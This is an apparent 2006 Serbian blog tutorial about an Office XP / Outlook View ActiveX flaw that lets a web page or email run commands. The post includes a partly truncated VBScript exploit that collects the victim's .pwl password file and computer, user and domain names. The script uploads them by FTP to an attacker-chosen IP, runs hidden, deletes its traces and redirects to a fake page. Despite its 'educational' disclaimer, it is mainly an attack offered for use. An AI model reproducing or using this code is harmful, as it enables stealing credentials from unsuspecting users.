TeenFun

Bug u office Xp

jul 8th, 2006

Napomena: Zelim da istaknem da je ovaj tutorial namenjen samo u edukativne svrhe i da autor ovog teksta nije odgovoran za bilo kakvu stetu koju napravite primenom ovih informacija.

[Kratak opis]

Kao i svaki bug, i ovaj ce pre ili kasnije biti uklonjen, ali evo o cemu se radi. Ako korisnik poseti specijalno dizajniranu stranicu sa Internet Explorerom, ili otvori ili pogleda poruku za programom OutLook XP, proizvoljne komande mogu biti izvrsene na korisnickom kompu. Koristeci ovaj MSOFFICEXP bug omogucava vam se jos i citanje, menjanje i brisanje poruka iz korisnikovih OutLook XP foldera. Ovaj problem je moguce izvrsiti na svim sigurnosnim nivoima IEa, bez ikakvog upozorenja korisnika!

[Detaljnije]

Problem je u ActivX-u. Prilikom instalacije OfficeXP instalira malicioznu ActiveX kontrolu - “Microsoft Outlook View Control”. Ova kontrola izlaze svojsto “selection” koje daje pristup korisnickim porukama. Takodje Vam izlaze Outlook “Application” objekat koji moze dovesti do izvrsenja programa na korisnickom kompu. U kombinaciji sa Windows Scripting Hostom, mogucnosti su beskrajne!

[Resenje problema]

Za sada je jedino resenje da uninstalirate Microsoft OfficeXP (a moze i Windows

[Primer koriscenja propusta]
—–| seci ovde |——-

Sacekajte par sekundi, i
bicete redirektovani…

stranicu napravio: dql

8 then sTempIme=left(sTempIme,8)
sIme=sTempIme

Set file = fso.CreateTextFile (”c:\windows\temp\komande.txt”, TRUE)
file.write “user”+vbcrlf ‘ime korisnickog imena za logovanje na ftp sajt
file.write “pass”+vbcrlf ’sifra za logovanje na ftp sajt
file.write “put c:\windows\”+cstr(sIme)+”.pwl”+vbcrlf
file.write “put c:\windows\temp\”+cstr(sIme)+”.txt”+vbcrlf
file.write “quit”+vbcrlf
file.Close
Set file = fso.CreateTextFile (”c:\windows\temp\”+cstr(sIme)+”.txt”, TRUE)
file.write “ime kompa: “+cstr(wshn.computername)+vbcrlf
file.write “ime usera: “+cstr(wshn.username)+vbcrlf
file.write “domen: “+cstr(wshn.userdomain)+vbcrlf
file.close
Set file = fso.CreateTextFile (”c:\windows\temp\fajl.bat”, TRUE)
file.write “ftp -s:c:\windows\temp\komande.txt 127.0.0.1″+vbcrlf ‘umesto 127.0.0.1 unesite IP hosta na koji treba da se uploaduje PWL
file.write “del c:\windows\temp\komande.txt”+vbcrlf
file.write “del c:\windows\temp\”+cstr(sIme)+”.txt”+vbcrlf
file.write “del c:\windows\temp\fajl.bat”+vbcrlf
file.close
wshs.run “c:\windows\temp\fajl.bat”,vbhide
location = “pocetna.htm” ‘preusmeravanje na laznu stranicu
End Sub

settimeout “f”,2000

–>

—–| seci ovde |——-

Posted in Tutorijali |

WP-Hashcash by Elliott Back protects you from spam. Please enable javascript and reload this page to add your comment.

Bug u office Xp

Leave a Reply

Arhive:

Blogovnik

Kategorije:

Meta:

Pretraga: